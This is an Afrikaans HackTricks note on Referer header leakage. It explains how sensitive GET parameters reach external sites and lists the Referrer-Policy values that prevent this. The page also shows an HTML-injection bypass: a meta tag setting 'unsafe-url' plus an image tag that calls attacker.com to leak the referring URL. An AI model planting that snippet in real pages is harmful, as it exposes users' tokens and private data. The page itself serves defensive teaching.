hacktricks/todo/interesting-http.md

3.5 KiB

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Verwysingskoppe en beleid

Verwysers is die kop wat deur webblaaie gebruik word om aan te dui watter die vorige bladsy was wat besoek is.

Sensitiewe inligting wat uitgelek is

Indien op enige punt binne 'n webbladsy enige sensitiewe inligting op GET-versoekparameters geleë is, as die bladsy skakels na eksterne bronne bevat of 'n aanvaller in staat is om die gebruiker te laat 'n URL besoek wat deur die aanvaller beheer word. Dit kan in staat wees om die sensitiewe inligting binne die laaste GET-versoek uit te skakel.

Versagting

Jy kan die blaaier laat 'n Verwysingsbeleid volg wat die sensitiewe inligting kan vermy om na ander webtoepassings gestuur te word:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Teenmaatreëling

Jy kan hierdie reël oorskryf deur 'n HTML meta-tag te gebruik (die aanvaller moet HTML-inspuiting benut):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Verdediging

Moenie enige sensitiewe data binne GET parameters of paaie in die URL plaas nie.

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: